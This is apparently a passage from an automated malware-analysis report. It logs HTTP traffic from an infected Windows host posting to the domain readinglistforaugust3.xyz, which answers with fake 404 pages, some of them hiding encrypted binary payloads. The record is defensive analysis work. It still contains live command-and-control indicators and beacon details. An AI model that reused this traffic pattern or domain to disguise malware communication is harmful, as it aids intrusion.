34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:16.937500954 CEST	3256	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 156 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:16.983211040 CEST	3257	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:16 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:16.990592003 CEST	3257	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 320 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:17.044471025 CEST	3258	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:17.067173958 CEST	3259	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 327 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:17.169482946 CEST	3261	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 33 66 66 36 36 0d 0a 00 00 a6 97 8c b4 08 02 7f 77 08 a7 e7 cb 2c c9 aa 43 96 74 c4 0c 23 20 5b f4 75 62 d6 86 a7 f2 12 bc a9 da 62 b6 a0 d6 8e 2a 03 c1 fe f5 78 80 42 09 22 23 7a 2b 5a be 51 83 37 f3 38 8f fd dd 37 2e 52 8c 23 e2 54 03 2c 1e 64 de 43 81 bc a4 b9 18 d8 e0 a3 e5 f9 b6 3f 7c 68 a0 d4 a1 a7 43 ab 78 a6 8f 31 88 43 72 56 b9 f9 4f 85 d1 73 62 c6 80 7d 19 09 03 aa d1 5f fb 83 4a 56 48 b2 50 68 63 5d d5 06 2d e0 35 a7 f9 a1 3b ac da 10 a3 d2 38 14 32 8f d7 8f 4e b3 00 be 22 88 c7 b7 d0 c7 87 45 c7 31 d5 a7 5f 81 cb 5f fb 57 79 93 73 72 62 19 33 be 34 16 e4 9c 32 11 61 7f 14 ef 78 78 30 be 80 f5 fd 31 4f c6 34 5d ee 71 0a 12 63 f7 cc eb 8b 8d 22 4f 81 4a c2 0d 6d b6 2e fa bc 06 b4 83 34 6b 27 30 77 1b bd 55 16 4a e2 50 47 9a 0e 3a 54 e9 43 82 e4 64 23 64 77 40 57 91 f8 32 2f 8f 66 60 93 9d b8 04 64 bf a3 d9 56 e5 57 72 6d f1 d5 54 ce 08 cd f7 dd e2 4e 8e 3d 17 c5 e6 c6 c6 09 b2 86 a4 a3 15 4d b1 77 12 ff a0 c1 94 52 07 2a 22 af 15 27 78 3a 02 f4 74 c6 51 e5 0d bb 27 32 43 c6 48 f8 87 a9 b2 c7 9e 43 b7 af 83 97 e1 1b d3 98 fe 36 5f 10 62 66 52 ef 2d 4c 31 5a 4f 52 54 9f 50 c5 0d 60 4f ff 1b 68 9b df 32 78 1d 2d ce d5 02 04 e7 14 ac f9 cc 13 91 3c 7a 54 19 51 5d 36 06 26 50 da 30 1c 01 8e 39 cb a8 65 17 92 54 67 f4 c1 ed fe 25 0d 1e 5d ea e8 07 3d 23 db 64 bb 2f 57 a1 7f d1 8e 65 c8 f6 1d eb 67 b7 f9 21 4d f3 77 b5 e9 ab 1c 91 23 0c 14 be a3 a6 65 79 cc 26 56 7a b9 0a dc f6 23 62 26 0a c5 53 c4 e4 66 93 38 b6 03 df 4b 2d 12 79 ba 21 49 e8 a8 25 99 a3 a0 cd 1b 38 c0 83 89 02 ed 02 65 12 aa 46 d0 d9 d6 b5 2e 51 fb ed 40 2b 76 1e 68 b3 01 67 cb 7b 20 71 b2 64 e1 26 15 96 a8 11 df f9 d4 af 46 50 bc db bb 68 fc 43 c2 ab 06 50 77 5e e0 62 74 b1 ba 3f 42 57 e9 f4 4e 31 af 22 3b d7 af 49 27 b5 8c 9a b1 20 59 00 73 78 d0 5f 53 07 6a b3 f3 e2 fc 21 65 3a 5f db 53 4f 17 4c 87 3a c6 34 a3 e1 69 6b ff 44 00 e5 63 73 2f 67 b8 63 56 f2 b6 9c b2 75 36 05 f7 c6 a6 7f 21 79 26 ea ee f8 8e ec 19 42 fb 22 6d c1 df e4 bd be 75 2f d3 b2 cc 9f f9 5b aa cf 25 51 57 50 b6 4c 92 32 1b b0 b7 11 7f 63 99 42 8f 1b 74 7c ae 78 c0 49 b5 00 0c df 45 d6 99 23 9a 7f 4e 0c 96 26 c1 04 f3 87 57 67 c3 09 88 43 f4 6b 41 af 89 4b 9b a1 03 ee ec d6 97 ef ec 44 d9 f4 7f 60 98 2b ba ff 27 83 54 24 f8 e5 cc 7a 5a 0f 61 e0 63 89 f3 0c 28 51 b9 f6 12 63 8a 91 b3 1f a2 4e 37 ab d7 a8 05 3a 8b 62 44 85 d5 79 e1 34 75 2f 5b 9b e3 c1 78 f2 c8 79 8e 6b 4e d2 1d ef 0b d6 39 e1 fb 37 e1 7e 58 07 e0 f0 b4 2d 91 6c 38 8b 0d ad 0f 45 84 ac f1 cc e6 60 81 fe 0c 56 0c c1 60 e7 ab 64 47 d3 e3 71 0d b2 19 1f b7 1c 9a 71 41 2a 27 6f e8 ee 65 44 50 7f c8 f1 9d e8 b4 7f 5d 7e 8e b6 58 c4 f6 2d c9 24 c0 0f 0d e9 41 67 f3 66 56 a3 44 d1 c4 a3 85 4b e7 cb 8a 6c 61 29 78 d5 a2 1e 97 94 13 5a 93 db 14 d8 53 d4 25 4b f7 d5 84 e3 56 40 28 66 00 32 25 d4 a1 d4 da d5 e9 25 7b d4 ea 6e 30 da 17 e8 b4 31 e9 32 95 23 09 72 74 1e 97 85 ce bf 87 9d 85 9d ca 27 a9 da 4e 81 23 e6 0f ac 86 cd 87 3b fe e1 39 be 29 cb 6b 8d d3 13 ac ed 9a e3 cf 59 ad 37 fc 83 b0 bc af 0c b6 40 bc 36 85 ac 3d eb 95 d9 ac d0 90 bb ec b0 70 02 81 8c 28 3c d6 ef ff e6 84 27 ed 5c 88 3b c2 00 67 95 39 1c cb dc 34 29 98 ab d6 f1 57 2a 46 e9 cf 36 ba c6 23 d9 74 d5 74 6d d4 c8 e1 a9 7d 6b 3c 34 5e 44 d9 86 db 87 ce 1c f0 ea e2 33 dc b5 f7 53 19 e0 65 ca df 19 47 f7 a1 1c aa 9b 31 52 88 d7 9f 5c a9 02 9f 71 60 9c a7 34 98 c4 1c 5a d1 1f 15 cf 0a a9 c5 26 8b 3d 4d 7d 36 bd 05 1b 98 73 e8 5b 9a dd 94 5a Data Ascii: 3ff66w,Ct# [ubbxB"#z+ZQ787.R#T,dC?\|hCx1CrVOsb}_JVHPhc]-5;82N"E1__Wysrb342axx01O4]qc"OJm.4k'0wUJPG:TCd#dw@W2/f`dVWrmTN=MwR"'x:tQ'2CHC6_bfR-L1ZORTP`Oh2x-<zTQ]6&P09eTg%]=#d/Weg!Mw#ey&Vz#b&Sf8K-y!I%8eF.Q@+vhg{ qd&FPhCPw^bt?BWN1";I' Ysx_Sj!e:_SOL:4ikDcs/gcVu6!y&B"mu/[%QWPL2cBt\|xIE#N&WgCkAKD`+'T$zZac(QcN7:bDy4u/[xykN97~X-l8E`V`dGqqA'oeDP]~X-$AgfVDKla)xZS%KV@(f2%%{n012#rt'N#;9)kY7@6=p(<'\;g94)WF6#ttm}k<4^D3SeG1R\q`4Z&=M}6s[Z
Aug 24, 2021 08:49:19.640351057 CEST	7959	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:19.690984011 CEST	7960	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:19.729324102 CEST	7960	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 244 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:19.779416084 CEST	7961	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:19.790589094 CEST	7961	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 185 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:19.880877018 CEST	7963	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 33 66 66 36 36 0d 0a 00 00 a6 97 8c b4 08 02 7f 77 08 a7 e7 cb 2c c9 aa 43 96 74 c4 0c 23 20 5b f4 75 62 d6 86 a7 f2 12 bc a9 da 62 b6 a0 d6 8e 2a 03 c1 fe f5 78 80 42 09 22 23 7a 2b 5a be 51 83 37 f3 38 8f fd dd 37 2e 52 8c 23 e2 54 03 2c 1e 64 de 43 81 bc a4 b9 18 d8 e0 a3 e5 f9 b6 3f 7c 68 a0 d4 a1 a7 43 ab 78 a6 8f 31 88 43 72 56 b9 f9 4f 85 d1 73 62 c6 80 7d 19 09 03 aa d1 5f fb 83 4a 56 48 b2 50 68 63 5d d5 06 2d e0 35 a7 f9 a6 c2 ab e7 10 a3 d2 38 14 32 8f d7 8f 4e b3 00 be 22 88 c7 b7 de c7 87 45 c3 31 d5 a7 5f 81 cb bf 7a 43 79 93 73 72 62 19 33 be 34 16 e4 9c 32 11 61 7f 14 ef 78 78 30 be 80 f5 fd 31 4f c6 34 5d ee 71 0a 12 63 f7 cc eb eb 96 22 4f 81 4a c2 7c 6b ae 2e fa bc 06 b4 83 34 6b 27 30 77 1b bd 55 16 4a e2 50 47 9a 0e 3a 54 e9 43 82 e4 64 23 64 77 40 57 91 f8 32 2f 8f 66 60 93 9d b8 04 64 bf 83 c6 56 01 53 72 6d f1 d5 54 ce 08 cd f7 dd e2 f4 97 3d 17 c5 e6 c6 c6 09 b2 86 a4 a3 15 4d b1 77 12 ff a0 c1 94 52 07 2a 22 af 15 27 78 3a 02 f4 74 c6 51 e5 0d bb 27 32 43 c6 48 f8 87 a9 b2 c7 9e 43 b7 af 83 97 e1 1b d3 98 fe 36 5f 10 62 66 52 ef 2d 4c 31 5a 4f 52 54 9f 50 c5 0d 60 4f ff 1b 68 9b df 32 78 1d 2d ce d5 02 04 e7 14 ac f9 cc 13 91 3c 7a 54 19 51 5d 36 06 26 50 da 30 12 01 8e 39 cb a8 65 17 92 54 67 f4 c1 ed fe 25 0d 1e 5d ea e8 07 3d 23 db 64 bb 2f 57 a1 7f d1 8e 65 c8 f6 1d eb 67 b7 f9 21 4d f3 71 b5 e9 ab 1c 91 23 0c 14 be a3 a6 65 79 cc 26 56 7a b9 0a dc f6 23 62 26 0a c5 b7 c0 e4 66 93 38 b6 03 df 1d 2d 12 79 a4 21 49 e8 a8 25 99 a3 a0 cd 1b 38 c0 83 89 02 ed 02 65 12 aa 46 d0 d9 d6 b5 2e 51 fb ed 40 2b 76 1e 68 b3 01 67 cb 7b 58 71 b2 64 e1 26 15 96 a8 11 df f9 d4 af 46 50 bc db bb 68 fc 43 c2 ab 06 50 77 5e e0 62 74 b1 ba 3f 42 57 e9 f4 4e 31 c7 22 3b d7 af 49 27 b5 8c 9a b1 20 59 00 73 78 d0 5f 53 07 6a b3 f3 e2 fc 21 65 3a 53 db 53 4f 17 4c 87 3a ca 34 a3 e1 01 6b ff 44 00 e5 63 73 2f 67 b8 63 56 f2 b6 9c b2 75 36 05 f7 c6 a6 7f 21 79 26 ea 6e 84 8e ec 19 42 fb 22 6d c1 df e4 bd be 75 2f d3 b2 cc 9f f9 5b aa cf 25 51 57 50 b6 4c 92 32 1b b0 b7 11 7f 63 99 42 21 10 74 7c 2e 6b c0 49 1b 0b 0c df 61 d6 99 23 9a 7f 4e 0c 96 26 c1 04 f3 87 57 67 c3 09 88 43 f4 6b 41 af 89 4b 9b 45 07 ee ec d6 b7 f0 ec 44 d5 f4 7f 60 0e 23 ba ff 27 83 54 24 f8 e5 cc 7a 5a 0f 61 e0 63 89 f3 0c 28 51 b9 f6 12 63 8a 91 b3 1f a2 4e 37 ab d7 a8 05 3a 8b 62 44 85 d5 79 e1 34 75 2f 5b 9b e3 c1 78 f2 c8 79 8e 6b 4e d2 1d ef 0b d6 39 e1 fb 37 e1 7e 58 07 e0 f0 b4 2d 91 6c 38 8b 0d ad 0f 45 84 ac f1 cc e6 60 81 fe 0c 56 0c c1 60 e7 ab 64 47 d3 e3 71 0d b2 19 1f b7 1c 9a 71 41 2a 27 6f e8 ee 65 44 50 7f c8 f1 9d e8 b4 7f 5d 7e 8e b6 58 c4 f6 2d c9 24 c0 0f 0d e9 41 67 f3 66 56 a3 44 d1 c4 a3 85 4b e7 cb 8a 6c 61 29 78 d5 a2 1e 97 94 13 5a 93 db 14 d8 53 d4 25 4b f7 d5 84 e3 56 40 28 66 00 32 25 d4 a1 d4 da d5 e9 25 7b d4 ea 6e 30 da 17 e8 b4 31 e9 32 95 23 09 72 74 1e 97 85 ce bf 87 9d 85 9d ca 27 a9 da 4e 81 23 e6 0f ac 86 cd 87 3b fe e1 39 be 29 cb 6b 8d d3 13 ac ed 9a e3 cf 59 ad 37 fc 83 b0 bc af 0c b6 40 bc 36 85 ac 3d eb 95 d9 ac d0 90 bb ec b0 70 02 81 8c 28 3c d6 ef ff e6 84 27 ed 5c 88 3b c2 00 67 95 39 1c cb dc 34 29 98 ab d6 f1 57 2a 46 19 cc 36 ba c6 23 d9 74 d5 74 6d d4 c8 e1 a9 7d 6b 3c 34 5e a0 df 86 db 87 ce 1c f0 e2 e2 33 dc 29 f0 53 19 d0 65 ca df 19 47 f7 a1 1c aa 9b 31 52 88 d7 9f 5c a9 02 9f 71 60 9c a7 34 98 c4 1c 5a d1 1f 15 cf 0a a9 c5 26 8b 3d 4d 7d 36 bd 05 1b 98 73 e8 5b 9a dd 94 5a Data Ascii: 3ff66w,Ct# [ubbxB"#z+ZQ787.R#T,dC?\|hCx1CrVOsb}_JVHPhc]-582N"E1_zCysrb342axx01O4]qc"OJ\|k.4k'0wUJPG:TCd#dw@W2/f`dVSrmT=MwR"'x:tQ'2CHC6_bfR-L1ZORTP`Oh2x-<zTQ]6&P09eTg%]=#d/Weg!Mq#ey&Vz#b&f8-y!I%8eF.Q@+vhg{Xqd&FPhCPw^bt?BWN1";I' Ysx_Sj!e:SSOL:4kDcs/gcVu6!y&nB"mu/[%QWPL2cB!t\|.kIa#N&WgCkAKED`#'T$zZac(QcN7:bDy4u/[xykN97~X-l8E`V`dGqqA'oeDP]~X-$AgfVDKla)xZS%KV@(f2%%{n012#rt'N#;9)kY7@6=p(<'\;g94)WF6#ttm}k<4^3)SeG1R\q`4Z&=M}6s[Z
Aug 24, 2021 08:49:27.330250978 CEST	14777	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 357 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:27.380386114 CEST	14801	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>
Aug 24, 2021 08:49:27.389930964 CEST	14801	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 206 Host: readinglistforaugust3.xyz
